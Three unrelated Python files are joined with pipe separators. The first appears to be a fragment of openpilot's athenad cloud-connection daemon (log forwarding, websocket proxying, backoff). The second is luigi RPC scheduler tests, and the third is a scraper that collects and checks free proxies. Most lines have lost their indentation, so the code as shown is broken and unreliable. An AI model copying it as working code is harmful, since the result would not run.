@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import jpeg_write, snapshot
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
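# Rough sketch of the xattr bookkeeping used above and in log_handler below:
# setxattr(path, LOG_ATTR_NAME, int.to_bytes(now, 4, sys.byteorder)) marks a log
# as sent, int.from_bytes(getxattr(path, LOG_ATTR_NAME), sys.byteorder) reads
# that mark back, and a missing or unparsable attribute is treated as
# "never sent" so the file is queued again.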
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
  # scan STATS_DIR at most once every 10 seconds
  last_scan = 0
  while not end_event.is_set():
    curr_scan = sec_since_boot()
try:
if curr_scan - last_scan > 10:
stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
if len(stat_filenames) > 0:
stat_path = os.path.join(STATS_DIR, stat_filenames[0])
with open(stat_path) as f:
jsonrpc = {
"method": "storeStats",
"params": {
"stats": f.read()
},
"jsonrpc": "2.0",
"id": stat_filenames[0]
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
os.remove(stat_path)
last_scan = curr_scan
except Exception:
cloudlog.exception("athena.stat_handler.exception")
time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
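# How the two proxy threads shut down together (descriptive note): they share
# the socketpair created in startLocalProxy -- ws_proxy_recv holds ssock and
# ws_proxy_send selects on csock (signal_sock). When ws_proxy_recv exits it
# closes ssock, which makes signal_sock readable and lets ws_proxy_send's
# select() wake up and stop even if local_sock is idle.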
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = low_priority_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
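# Framing sketch for ws_send above: if WS_FRAME_SIZE were 4096 (illustrative
# value only), a 10000-byte JSON payload would go out as three frames --
# TEXT(fin=0), CONT(fin=0), CONT(fin=1) -- which the receiving end reassembles
# into a single websocket message.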
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
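# backoff() is exponential backoff with full jitter, capped at 128 seconds:
# retries=0 always yields 0, retries=3 picks from [0, 8), and retries>=7 picks
# from [0, 128), spreading reconnect attempts across devices.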
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.commadotai.com/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
rpc_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest
try:
from unittest import mock
except ImportError:
import mock
import luigi.rpc
from luigi.scheduler import Scheduler
import scheduler_api_test
import luigi.server
from server_test import ServerTestBase
import time
import socket
from multiprocessing import Process, Queue
import requests
class RemoteSchedulerTest(unittest.TestCase):
def testUrlArgumentVariations(self):
for url in ['http://zorg.com', 'http://zorg.com/']:
for suffix in ['api/123', '/api/123']:
s = luigi.rpc.RemoteScheduler(url, 42)
with mock.patch.object(s, '_fetcher') as fetcher:
s._fetch(suffix, '{}')
fetcher.fetch.assert_called_once_with('http://zorg.com/api/123', '{}', 42)
def get_work(self, fetcher_side_effect):
class ShorterWaitRemoteScheduler(luigi.rpc.RemoteScheduler):
"""
A RemoteScheduler which waits shorter than usual before retrying (to speed up tests).
"""
def _wait(self):
time.sleep(1)
scheduler = ShorterWaitRemoteScheduler('http://zorg.com', 42)
with mock.patch.object(scheduler, '_fetcher') as fetcher:
fetcher.raises = socket.timeout
fetcher.fetch.side_effect = fetcher_side_effect
return scheduler.get_work("fake_worker")
def test_retry_rpc_method(self):
"""
Tests that a call to a RPC method is re-tried 3 times.
"""
fetch_results = [socket.timeout, socket.timeout, '{"response":{}}']
self.assertEqual({}, self.get_work(fetch_results))
def test_retry_rpc_limited(self):
"""
Tests that a call to an RPC method fails after the third attempt
"""
fetch_results = [socket.timeout, socket.timeout, socket.timeout]
self.assertRaises(luigi.rpc.RPCError, self.get_work, fetch_results)
def test_get_work_retries_on_null(self):
"""
Tests that get_work will retry if the response is null
"""
fetch_results = ['{"response": null}', '{"response": {"pass": true}}']
self.assertEqual({'pass': True}, self.get_work(fetch_results))
def test_get_work_retries_on_null_limited(self):
"""
Tests that get_work will give up after the third null response
"""
fetch_results = ['{"response": null}'] * 3 + ['{"response": {}}']
self.assertRaises(luigi.rpc.RPCError, self.get_work, fetch_results)
class RPCTest(scheduler_api_test.SchedulerApiTest, ServerTestBase):
def get_app(self):
conf = self.get_scheduler_config()
sch = Scheduler(**conf)
return luigi.server.app(sch)
def setUp(self):
super(RPCTest, self).setUp()
self.sch = luigi.rpc.RemoteScheduler(self.get_url(''))
self.sch._wait = lambda: None
# disable test that doesn't work with remote scheduler
def test_task_first_failure_time(self):
pass
def test_task_first_failure_time_remains_constant(self):
pass
def test_task_has_excessive_failures(self):
pass
def test_quadratic_behavior(self):
""" This would be too slow to run through network """
pass
def test_get_work_speed(self):
""" This would be too slow to run through network """
pass
class RequestsFetcherTest(ServerTestBase):
def test_fork_changes_session(self):
session = requests.Session()
fetcher = luigi.rpc.RequestsFetcher(session)
q = Queue()
def check_session(q):
fetcher.check_pid()
# make sure that check_pid has changed out the session
q.put(fetcher.session != session)
p = Process(target=check_session, args=(q,))
p.start()
p.join()
self.assertTrue(q.get(), 'the requests.Session should have changed in the new process')
|
getIp.py
|
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import bs4
import lxml
from multiprocessing import Process, Queue
import random
import json
import time
class Proxies(object):
"""docstring for Proxies"""
def __init__(self, page=3):
self.proxies = []
self.verify_pro = []
self.page = page
self.headers = {
'Accept': '*/*',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8'
}
self.get_proxies()
self.get_proxies_nn()
def get_proxies(self):
page = random.randint(1,10)
page_stop = page + self.page
while page < page_stop:
url = 'http://www.xicidaili.com/nt/%d' % page
html = requests.get(url, headers=self.headers).content
soup = BeautifulSoup(html, 'lxml')
ip_list = soup.find(id='ip_list')
for odd in ip_list.find_all(class_='odd'):
protocol = odd.find_all('td')[5].get_text().lower()+'://'
self.proxies.append(protocol + ':'.join([x.get_text() for x in odd.find_all('td')[1:3]]))
page += 1
def get_proxies_nn(self):
page = random.randint(1,10)
page_stop = page + self.page
while page < page_stop:
url = 'http://www.xicidaili.com/nn/%d' % page
html = requests.get(url, headers=self.headers).content
soup = BeautifulSoup(html, 'lxml')
ip_list = soup.find(id='ip_list')
for odd in ip_list.find_all(class_='odd'):
protocol = odd.find_all('td')[5].get_text().lower() + '://'
self.proxies.append(protocol + ':'.join([x.get_text() for x in odd.find_all('td')[1:3]]))
page += 1
def verify_proxies(self):
        # queue of proxies that have not been verified yet
old_queue = Queue()
        # queue of proxies that passed verification
new_queue = Queue()
print ('verify proxy........')
works = []
for _ in range(15):
works.append(Process(target=self.verify_one_proxy, args=(old_queue,new_queue)))
for work in works:
work.start()
for proxy in self.proxies:
old_queue.put(proxy)
for work in works:
old_queue.put(0)
for work in works:
work.join()
self.proxies = []
while 1:
try:
self.proxies.append(new_queue.get(timeout=1))
            except Exception:
break
print ('verify_proxies done!')
def verify_one_proxy(self, old_queue, new_queue):
while 1:
proxy = old_queue.get()
            if proxy == 0:
                break
protocol = 'https' if 'https' in proxy else 'http'
proxies = {protocol: proxy}
try:
if requests.get('http://www.baidu.com', proxies=proxies, timeout=2).status_code == 200:
print ('success %s' % proxy)
new_queue.put(proxy)
            except Exception:
print ('fail %s' % proxy)
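# Shutdown note (descriptive only): verify_proxies() puts one 0 on old_queue
# per worker after all the real proxies, so each verify_one_proxy loop exits
# when it reads that sentinel.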
if __name__ == '__main__':
a = Proxies()
a.verify_proxies()
print (a.proxies)
proxie = a.proxies
with open('proxies.txt', 'a') as f:
for proxy in proxie:
f.write(proxy+'\n')
|